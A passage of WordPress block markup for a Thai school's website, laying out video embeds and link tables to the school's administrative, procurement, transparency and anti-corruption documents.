-->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 